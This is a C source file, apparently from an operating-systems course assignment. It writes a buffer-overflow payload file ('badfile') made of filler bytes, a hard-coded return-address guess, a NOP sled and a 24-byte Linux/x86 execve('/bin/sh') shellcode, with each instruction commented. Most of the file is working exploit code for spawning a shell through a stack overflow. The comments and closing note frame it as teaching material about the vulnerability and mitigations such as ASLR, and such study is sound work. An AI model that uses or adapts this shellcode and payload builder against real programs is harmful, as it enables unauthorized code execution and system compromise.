/* exploit.c */
/* A program that creates a file containing code for launching a shell */
#include <stdlib.h> | |
#include <stdio.h> | |
#include <string.h> | |
/*
 * Linux/x86 (32-bit) execve("/bin/sh") shellcode: 24 bytes, none of them
 * 0x00, so strlen() on it below yields the payload length and only the
 * string literal's trailing NUL is left out. "//sh" pads the path to two
 * 4-byte pushes; the kernel treats "//" as "/". One string piece below is
 * one instruction.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax    -- eax = 0 */
"\x50" /* pushl %eax        -- NUL terminator of the path string */
"\x68""//sh" /* pushl $0x68732f2f -- "//sh" */
"\x68""/bin" /* pushl $0x6e69622f -- "/bin"; stack now holds "/bin//sh\0" */
"\x89\xe3" /* movl %esp,%ebx    -- ebx = path pointer (execve arg 1) */
"\x50" /* pushl %eax        -- NULL that ends argv */
"\x53" /* pushl %ebx        -- argv[0] = path */
"\x89\xe1" /* movl %esp,%ecx    -- ecx = argv (execve arg 2) */
"\x99" /* cltd              -- edx = 0, i.e. envp = NULL (arg 3); mnemonic was misspelt "cdql" */
"\xb0\x0b" /* movb $0x0b,%al    -- al = 11 = __NR_execve on i386 */
"\xcd\x80" /* int $0x80         -- enter the kernel */
;
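/*
 * Entry point: writes the 517-byte payload image to "./badfile".
 *
 * Buffer layout (byte offsets):
 *   [0, 20)                 mycode: 16 bytes of 0xff filler (12 for the
 *                           target's local buffer, 4 for its saved frame
 *                           pointer) followed by a 4-byte little-endian
 *                           return-address guess
 *   [20, startpoint)        0x90 (NOP) sled
 *   [startpoint, endpoint)  the global shellcode, placed near the end of
 *                           the buffer at a 4-byte-aligned offset
 *   [endpoint, 517)         remaining 0x90 bytes
 *
 * The return address is a hard-coded guess; the author's own notes say the
 * intended in-place patching of mycode+16 was "currently not working", and
 * nothing here computes or verifies it. A payload that depends on a fixed
 * stack address plus a NOP sled is exactly what the standard mitigations
 * (ASLR, non-executable stack, stack canaries) break, which is the point
 * of the assignment this came from.
 *
 * Fixes over the original: int main instead of void main, memset on the
 * array rather than its address, a guard that the shellcode fits, binary
 * mode for the output, and checked fopen/fwrite/fclose.
 *
 * Returns EXIT_SUCCESS when the file was written completely, EXIT_FAILURE
 * if the shellcode does not fit or any file operation fails; failures are
 * reported on stderr.
 */
int main(int argc, char **argv)
{
    enum { BUF_SIZE = 517, PREFIX_LEN = 20 };
    static const char badfile_path[] = "./badfile";
    char buffer[BUF_SIZE];
    /* Exactly PREFIX_LEN bytes, so the literal's NUL is not stored. The
     * last four bytes are the return-address guess, little-endian. */
    char mycode[PREFIX_LEN] =
        "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
        "\xff\xff\xff\xff"
        "\x40\xf3\xff\xbf"; /* 0xbffff340 -- a guess; see header comment */

    (void)argc;
    (void)argv;

    /* Everything not explicitly overwritten below stays a NOP. */
    memset(buffer, 0x90, sizeof buffer);
    memcpy(buffer, mycode, sizeof mycode);

    /* shellcode contains no 0x00 bytes, so strlen() is its payload length
     * (the string literal's trailing NUL is not copied). */
    size_t sc_len = strlen(shellcode);
    if (sc_len > (size_t)(BUF_SIZE - 1 - PREFIX_LEN)) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit in the buffer\n",
                sc_len);
        return EXIT_FAILURE;
    }
    /* Place the shellcode as far toward the end of the 516 usable bytes as
     * a 4-byte-aligned offset allows; the division truncates downward. */
    size_t startpoint = ((BUF_SIZE - 1 - sc_len - PREFIX_LEN) / 4) * 4;
    memcpy(buffer + startpoint, shellcode, sc_len);

    /* Binary mode: the buffer is raw bytes, not text. */
    FILE *out = fopen(badfile_path, "wb");
    if (out == NULL) {
        perror(badfile_path);
        return EXIT_FAILURE;
    }
    int rc = EXIT_SUCCESS;
    if (fwrite(buffer, sizeof buffer, 1, out) != 1) {
        perror("fwrite");
        rc = EXIT_FAILURE;
    }
    /* fclose flushes; a failed flush is a failed write. */
    if (fclose(out) != 0) {
        perror(badfile_path);
        rc = EXIT_FAILURE;
    }
    return rc;
}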
Note: this was for an OS assignment demonstrating the buffer-overflow vulnerability of certain executables, and ways to counteract those vulnerabilities.